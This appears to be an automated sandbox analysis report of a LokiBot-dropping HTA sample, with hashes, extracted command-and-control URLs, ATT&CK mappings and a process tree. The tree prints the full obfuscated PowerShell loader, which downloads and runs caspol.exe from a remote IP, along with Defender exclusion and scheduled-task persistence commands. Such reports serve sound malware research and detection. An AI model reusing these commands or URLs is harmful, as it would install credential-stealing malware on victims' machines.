Analysis
-
max time kernel
138s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-11-2024 02:13
Static task
static1
Behavioral task
behavioral1
Sample
11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182.hta
Resource
win10v2004-20241007-en
General
-
Target
11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182.hta
-
Size
178KB
-
MD5
e80a6dc30c45134e8c433ef07277022f
-
SHA1
9041ab7b0cf03e4c18f86ff32eac95c3ad06f462
-
SHA256
11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182
-
SHA512
6156f6fcb24fedaabb7d1d62a0ff71e7bd8c6ab194c1a5c1b7ccc25644ba36dd62a79a8989dba98015044502a64db5c32187b802cc42dc964f25323c352519d8
-
SSDEEP
96:4vCl17nlkfktbLVe4I9qWs5cew1WyNk6O5Q:4vCldn+s9he4CqWj26O5Q
Malware Config
Extracted
lokibot
http://94.156.177.95/simple/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 14 4464 pOwersheLl.eXe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4240 powershell.exe 1376 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 4464 pOwersheLl.eXe 4980 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation caspol.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 3 IoCs
pid Process 3392 caspol.exe 2008 caspol.exe 4028 caspol.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3392 set thread context of 2008 3392 caspol.exe 112 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOwersheLl.eXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caspol.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4648 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4464 pOwersheLl.eXe 4464 pOwersheLl.eXe 4980 powershell.exe 4980 powershell.exe 4240 powershell.exe 1376 powershell.exe 3392 caspol.exe 3392 caspol.exe 4240 powershell.exe 1376 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4464 pOwersheLl.eXe Token: SeDebugPrivilege 4980 powershell.exe Token: SeDebugPrivilege 4240 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeDebugPrivilege 3392 caspol.exe Token: SeDebugPrivilege 2008 caspol.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 1940 wrote to memory of 4464 1940 mshta.exe 85 PID 1940 wrote to memory of 4464 1940 mshta.exe 85 PID 1940 wrote to memory of 4464 1940 mshta.exe 85 PID 4464 wrote to memory of 4980 4464 pOwersheLl.eXe 88 PID 4464 wrote to memory of 4980 4464 pOwersheLl.eXe 88 PID 4464 wrote to memory of 4980 4464 pOwersheLl.eXe 88 PID 4464 wrote to memory of 624 4464 pOwersheLl.eXe 93 PID 4464 wrote to memory of 624 4464 pOwersheLl.eXe 93 PID 4464 wrote to memory of 624 4464 pOwersheLl.eXe 93 PID 624 wrote to memory of 752 624 csc.exe 94 PID 624 wrote to memory of 752 624 csc.exe 94 PID 624 wrote to memory of 752 624 csc.exe 94 PID 4464 wrote to memory of 3392 4464 pOwersheLl.eXe 100 PID 4464 wrote to memory of 3392 4464 pOwersheLl.eXe 100 PID 4464 wrote to memory of 3392 4464 pOwersheLl.eXe 100 PID 3392 wrote to memory of 4240 3392 caspol.exe 105 PID 3392 wrote to memory of 4240 3392 caspol.exe 105 PID 3392 wrote to memory of 4240 3392 caspol.exe 105 PID 3392 wrote to memory of 1376 3392 caspol.exe 107 PID 3392 wrote to memory of 1376 3392 caspol.exe 107 PID 3392 wrote to memory of 1376 3392 caspol.exe 107 PID 3392 wrote to memory of 4648 3392 caspol.exe 109 PID 3392 wrote to memory of 4648 3392 caspol.exe 109 PID 3392 wrote to memory of 4648 3392 caspol.exe 109 PID 3392 wrote to memory of 4028 3392 caspol.exe 111 PID 3392 wrote to memory of 4028 3392 caspol.exe 111 PID 3392 wrote to memory of 4028 3392 caspol.exe 111 PID 3392 wrote to memory of 2008 3392 caspol.exe 112 PID 3392 wrote to memory of 2008 3392 caspol.exe 112 PID 3392 wrote to memory of 2008 3392 caspol.exe 112 PID 3392 wrote to memory of 2008 3392 caspol.exe 112 PID 3392 wrote to memory of 2008 3392 caspol.exe 112 PID 3392 wrote to memory of 2008 3392 caspol.exe 112 PID 3392 wrote to memory of 2008 3392 caspol.exe 112 PID 3392 wrote to memory of 2008 3392 caspol.exe 112 PID 3392 wrote to memory of 2008 3392 caspol.exe 112 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe"C:\Windows\sYStem32\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe" "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; INvoKe-eXPrEssIOn($(InvoKe-eXPRessIon('[sYsteM.tExT.eNcODing]'+[ChaR]0x3A+[cHAr]58+'utF8.GetstrIng([SYStEM.CoNVErT]'+[cHAr]58+[CHaR]58+'FROmbASE64STRinG('+[ChAR]34+'JFo3VE02ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFckRFZmluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnJwdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGaUVJdnlPaGJJcyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWVCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPZ2NBUnYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo3VE02OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjQzLjEzNi8zNy9jYXNwb2wuZXhlIiwiJGVuVjpBUFBEQVRBXGNhc3BvbC5leGUiLDAsMCk7c1RBUlQtc0xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjYXNwb2wuZXhlIg=='+[CHAr]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3r12k2sf\3r12k2sf.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC719.tmp" "c:\Users\Admin\AppData\Local\Temp\3r12k2sf\CSCEF7EBA91F50543469AF076C0231EAEEA.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:752
-
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pYSJOdJUV.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYSJOdJUV" /XML "C:\Users\Admin\AppData\Local\Temp\tmp775E.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4648
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
PID:4028
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2008
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD577a19fae546cc5a8215da61b018fe201
SHA19148bcb04b8fead75f4f262bf6e3efaca6f074ff
SHA256a52359a84d379ef92c36a3c455d570aaff606c10f24aa89db3768a834a4cac21
SHA5123e911067cef28c64113adde76f6cddf33e5526a12ab788464894f62c71f491fc0e7c5cd2a8eb197629c5fee81991d282e7aace6a47ce8a48e07604e966a5a0db
-
Filesize
17KB
MD5c8c4710426720a42c39c741c417f0ff0
SHA1e2aa3d9e64ea214e7c173c2b5def63566d0fb791
SHA25600f25b082ac90a05ee3b278fabf68c85c5b70d83dc9b6f7aa7e6d033f289243c
SHA512e1f4af8b832544aee75ea224fbcbe18f1cefae78be26fc46dee505846d6c852d3e014ab32888da5d21fe61ac2972b606d8b8e71390741c670dd5b09e631109e2
-
Filesize
3KB
MD5047db5d2abb24113a51e996fd6787210
SHA14972acf6e257c3247dd1ff92ff62006a8066a044
SHA2569481b624c8327e4d3b4c5248cd3c13179765c7f48fd4d8c0e500f92b7730412e
SHA512ecb3c52d241ff60adbaa6eddb071a252a154aae6d7c674f967f264985c3345121251d2ac3c334420b4cf8ccc36aa587b724448da7d1c078b2881b973a7a879d6
-
Filesize
1KB
MD579ba557091a03b3908b700f966ed045e
SHA113e974cfb985dfc77f84e5d0ecb1a991de64d0c5
SHA256481e0cda505d1bb8329a9dbed9ff2b7c5c2c217604aed8c78b3793e103c45328
SHA5121ed2edff2072b4ce646cf70ad0c7671f6c47f5a26bc38e790f2a7ae3ed159865ad0c524f3bac6e988397fc2b7188ab62e455b03af4a4655944e10a934552408e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5366c1d61f126fa1ee5fd11e6ee6db782
SHA154424fed9bb9412f3688f80950e442c75eb707fd
SHA25698cd5d7ff45e1df10d5d44c41cb4a30f2275e61b7f1a95c52236f4bf1d3c65a0
SHA512e0aeb73077ca58fcac23b0cd07d964c34b61fc91465322f76d8df30288ee7fb47ad107c392d86aae5ec53464449a29b678ba8d47cd0aede77f4e6fd62de042f3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-493223053-2004649691-1575712786-1000\0f5007522459c86e95ffcc62f32308f1_755b0f1a-bb38-4bb2-bc7e-240c892146ee
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-493223053-2004649691-1575712786-1000\0f5007522459c86e95ffcc62f32308f1_755b0f1a-bb38-4bb2-bc7e-240c892146ee
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
Filesize
568KB
MD5318ff90d7a2797a041b836f7f8900f62
SHA1fdda6afed7a1643ae353e7a635e6744c2b0a07d5
SHA256241d0df35796a2c2ae0ae4af70ef9e6571c23536fef35c1c0c172d703203a430
SHA512808942ba5db2e4d3d1d29a52c065acad4fcaae328dc43a3b977234f1b58d2838abf73d03b0992cd0f5ac4939e29f354c6c2ea25a4822a461b8ef74cec0eb3aac
-
Filesize
464B
MD5f8419bbc398e1a2b134eec88b333f8f6
SHA157ebba4cad00272da80b919df0908ec40f9be48a
SHA25625fccfa20b9b6d921f804167f1637df00cdd3203af9c0313f99de7c6e9989db3
SHA512b1f4044b7a62e1de69d8e4a8ebf4db6bb24fd40d486ec5e44bd3e6b835e62ef5078c79236ded9c21ce1b0acd3575acaf1908f4fcc6ee12f1fd5f7455c4b14674
-
Filesize
369B
MD5529bf2897ad4741cd16f28e263479182
SHA187e145a6cb38b99b422144f4714f68d4171be67d
SHA25630fa4fae0e4b8df16ff2b37a101f64af84b753964fedb64c7ba8526236f23822
SHA51287e811423e835ec369ed00503a18c9225d9db9aad75c0cac710c2816c8be2cd14db5ec3d5930c81ed52b260d3f20387ffbdd540264ad4498cb209c9da9b5429b
-
Filesize
652B
MD57e4c1d97410eda85b59db63274d607c2
SHA185434df29baf1e1b6df92e1324a84184d4d3483b
SHA2568e0be0f884ce86c6acd923a9d3df8640c96ac21997bfc9a9f123fc35c8811d97
SHA51295fd7ec35fc3b5c85b33be16df4091db61e7be7a92452b5870a9e89d509f95c3f33cb28d5e43654237f32af9869570a62123263234b116249f75e74f6b11e78a